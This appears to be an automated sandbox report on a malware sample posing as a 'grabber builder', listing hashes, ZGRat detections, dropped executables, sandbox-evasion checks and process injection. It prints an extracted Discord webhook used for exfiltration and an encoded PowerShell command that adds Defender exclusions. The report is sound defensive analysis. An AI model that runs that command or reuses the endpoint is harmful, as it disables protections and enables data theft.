Analysis
-
max time kernel
320s -
max time network
325s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
16-02-2024 12:03
Static task
static1
Behavioral task
behavioral1
Sample
VespyGrabberBuilder.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
VespyGrabberBuilder.exe
Resource
win10v2004-20231215-en
General
-
Target
VespyGrabberBuilder.exe
-
Size
12.6MB
-
MD5
fab385fb154644665f94aca9424fb0ce
-
SHA1
8dc525108cebd97b3127129cc1633a7f31010424
-
SHA256
c08b63c50a78ca119a5ff4fe10592a0f66289708df38349e91e645214aae7576
-
SHA512
07def38b8590ebaa95d7213e77e3892f60f10a87cef797fa07c6feb033f08d4148024360c7c32b5f92441c41236b8a86e66cee59bb51d6fbde97b86923a640e3
-
SSDEEP
393216:NayDfg/3Y8G6jgVINcfwt+F2CZZiLe2Wq:wyDfYPwPwtO2Mie2J
Malware Config
Extracted
growtopia
https://discord.com/api/webhooks/1199763266872803338/8vedcXoMcyExhe1xhBm5f8ncmafWmOB3pkulE0l8g9Pel0t3ziyr2V51cLTVEjYsE4Rj
Signatures
-
Detect ZGRat V1 34 IoCs
resource yara_rule behavioral2/memory/3084-52-0x0000000005680000-0x00000000056EC000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-59-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-58-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-64-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-68-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-79-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-84-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-86-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-107-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-112-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-118-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-123-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-125-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-127-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-133-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-135-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-137-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-139-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-142-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-145-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-147-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-157-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-160-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-163-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-165-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-167-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-169-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-171-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-173-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-175-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-177-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-179-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-181-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 behavioral2/memory/3084-183-0x0000000005680000-0x00000000056E5000-memory.dmp family_zgrat_v1 -
Creates new service(s) 1 TTPs
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation VespyGrabberBuilder.exe Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation WinErrorMgr.exe -
Executes dropped EXE 8 IoCs
pid Process 3084 Ilkdt.exe 1844 WinHostMgr.exe 636 WinErrorMgr.exe 2368 Sahyui1337.exe 4116 KeyGeneratorTOP.exe 4048 WinErrorMgr.exe 2136 KeyGeneratorTOP.exe 3492 bauwrdgwodhv.exe -
Loads dropped DLL 4 IoCs
pid Process 2136 KeyGeneratorTOP.exe 2136 KeyGeneratorTOP.exe 2136 KeyGeneratorTOP.exe 2136 KeyGeneratorTOP.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 47 discord.com 50 discord.com 131 pastebin.com 132 pastebin.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 233 api.ipify.org 600 api.ipify.org 229 api.ipify.org -
Drops file in System32 directory 5 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe bauwrdgwodhv.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt minidump-analyzer.exe File opened for modification C:\Windows\system32\MRT.exe WinHostMgr.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3492 set thread context of 3140 3492 bauwrdgwodhv.exe 166 PID 3492 set thread context of 4728 3492 bauwrdgwodhv.exe 174 -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2852 sc.exe 1480 sc.exe 4464 sc.exe 3080 sc.exe 680 sc.exe 3920 sc.exe 1384 sc.exe 4564 sc.exe 4012 sc.exe 5036 sc.exe 4448 sc.exe 216 sc.exe 2384 sc.exe 1568 sc.exe -
Detects Pyinstaller 4 IoCs
resource yara_rule behavioral2/files/0x000600000002323b-57.dat pyinstaller behavioral2/files/0x000600000002323b-63.dat pyinstaller behavioral2/files/0x000600000002323b-92.dat pyinstaller behavioral2/files/0x000600000002323b-119.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4852 schtasks.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3336304223-2978740688-3645194410-1000\{040ADA23-5024-4E54-A752-3F6EF7870498} msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2368 Sahyui1337.exe 2368 Sahyui1337.exe 552 Process not Found 552 Process not Found 1932 msedge.exe 1932 msedge.exe 4200 msedge.exe 4200 msedge.exe 1844 WinHostMgr.exe 4236 powershell.exe 4236 powershell.exe 4236 powershell.exe 1844 WinHostMgr.exe 1844 WinHostMgr.exe 1844 WinHostMgr.exe 1844 WinHostMgr.exe 1844 WinHostMgr.exe 1844 WinHostMgr.exe 1844 WinHostMgr.exe 1844 WinHostMgr.exe 1844 WinHostMgr.exe 1844 WinHostMgr.exe 1844 WinHostMgr.exe 1844 WinHostMgr.exe 1844 WinHostMgr.exe 1844 WinHostMgr.exe 3492 bauwrdgwodhv.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1480 identity_helper.exe 1480 identity_helper.exe 3492 bauwrdgwodhv.exe 3492 bauwrdgwodhv.exe 3492 bauwrdgwodhv.exe 3492 bauwrdgwodhv.exe 3492 bauwrdgwodhv.exe 3492 bauwrdgwodhv.exe 3492 bauwrdgwodhv.exe 3492 bauwrdgwodhv.exe 3492 bauwrdgwodhv.exe 3492 bauwrdgwodhv.exe 3492 bauwrdgwodhv.exe 3492 bauwrdgwodhv.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe 4728 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 672 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 46 IoCs
pid Process 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
description pid Process Token: SeDebugPrivilege 2368 Sahyui1337.exe Token: SeDebugPrivilege 3084 Ilkdt.exe Token: SeDebugPrivilege 552 Process not Found Token: SeDebugPrivilege 4236 powershell.exe Token: SeShutdownPrivilege 2432 powercfg.exe Token: SeCreatePagefilePrivilege 2432 powercfg.exe Token: SeShutdownPrivilege 3100 powercfg.exe Token: SeCreatePagefilePrivilege 3100 powercfg.exe Token: SeShutdownPrivilege 3140 conhost.exe Token: SeCreatePagefilePrivilege 3140 conhost.exe Token: SeShutdownPrivilege 4280 powercfg.exe Token: SeCreatePagefilePrivilege 4280 powercfg.exe Token: SeDebugPrivilege 1396 powershell.exe Token: SeShutdownPrivilege 5004 powercfg.exe Token: SeCreatePagefilePrivilege 5004 powercfg.exe Token: SeShutdownPrivilege 4760 powercfg.exe Token: SeCreatePagefilePrivilege 4760 powercfg.exe Token: SeShutdownPrivilege 3580 msedge.exe Token: SeCreatePagefilePrivilege 3580 msedge.exe Token: SeShutdownPrivilege 4264 powercfg.exe Token: SeCreatePagefilePrivilege 4264 powercfg.exe Token: SeLockMemoryPrivilege 4728 explorer.exe Token: SeCreateGlobalPrivilege 6028 dwm.exe Token: SeChangeNotifyPrivilege 6028 dwm.exe Token: 33 6028 dwm.exe Token: SeIncBasePriorityPrivilege 6028 dwm.exe Token: SeCreateGlobalPrivilege 1112 dwm.exe Token: SeChangeNotifyPrivilege 1112 dwm.exe Token: 33 1112 dwm.exe Token: SeIncBasePriorityPrivilege 1112 dwm.exe -
Suspicious use of FindShellTrayWindow 45 IoCs
pid Process 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 388 firefox.exe 388 firefox.exe 388 firefox.exe 388 firefox.exe 388 firefox.exe 388 firefox.exe -
Suspicious use of SendNotifyMessage 37 IoCs
pid Process 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 388 firefox.exe 388 firefox.exe 388 firefox.exe 388 firefox.exe 388 firefox.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 388 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1164 wrote to memory of 552 1164 VespyGrabberBuilder.exe 92 PID 1164 wrote to memory of 552 1164 VespyGrabberBuilder.exe 92 PID 1164 wrote to memory of 552 1164 VespyGrabberBuilder.exe 92 PID 1164 wrote to memory of 3084 1164 VespyGrabberBuilder.exe 94 PID 1164 wrote to memory of 3084 1164 VespyGrabberBuilder.exe 94 PID 1164 wrote to memory of 3084 1164 VespyGrabberBuilder.exe 94 PID 1164 wrote to memory of 1844 1164 VespyGrabberBuilder.exe 95 PID 1164 wrote to memory of 1844 1164 VespyGrabberBuilder.exe 95 PID 1164 wrote to memory of 636 1164 VespyGrabberBuilder.exe 96 PID 1164 wrote to memory of 636 1164 VespyGrabberBuilder.exe 96 PID 1164 wrote to memory of 636 1164 VespyGrabberBuilder.exe 96 PID 1164 wrote to memory of 2368 1164 VespyGrabberBuilder.exe 97 PID 1164 wrote to memory of 2368 1164 VespyGrabberBuilder.exe 97 PID 1164 wrote to memory of 4116 1164 VespyGrabberBuilder.exe 99 PID 1164 wrote to memory of 4116 1164 VespyGrabberBuilder.exe 99 PID 636 wrote to memory of 4048 636 WinErrorMgr.exe 100 PID 636 wrote to memory of 4048 636 WinErrorMgr.exe 100 PID 636 wrote to memory of 4048 636 WinErrorMgr.exe 100 PID 4116 wrote to memory of 2136 4116 KeyGeneratorTOP.exe 101 PID 4116 wrote to memory of 2136 4116 KeyGeneratorTOP.exe 101 PID 4048 wrote to memory of 4852 4048 WinErrorMgr.exe 102 PID 4048 wrote to memory of 4852 4048 WinErrorMgr.exe 102 PID 4048 wrote to memory of 4852 4048 WinErrorMgr.exe 102 PID 2136 wrote to memory of 4200 2136 KeyGeneratorTOP.exe 104 PID 2136 wrote to memory of 4200 2136 KeyGeneratorTOP.exe 104 PID 4200 wrote to memory of 4160 4200 msedge.exe 105 PID 4200 wrote to memory of 4160 4200 msedge.exe 105 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107 PID 4200 wrote to memory of 2056 4200 msedge.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\VespyGrabberBuilder.exe"C:\Users\Admin\AppData\Local\Temp\VespyGrabberBuilder.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAcgB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAZAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGkAYgBxACMAPgA="2⤵PID:552
-
-
C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3084
-
-
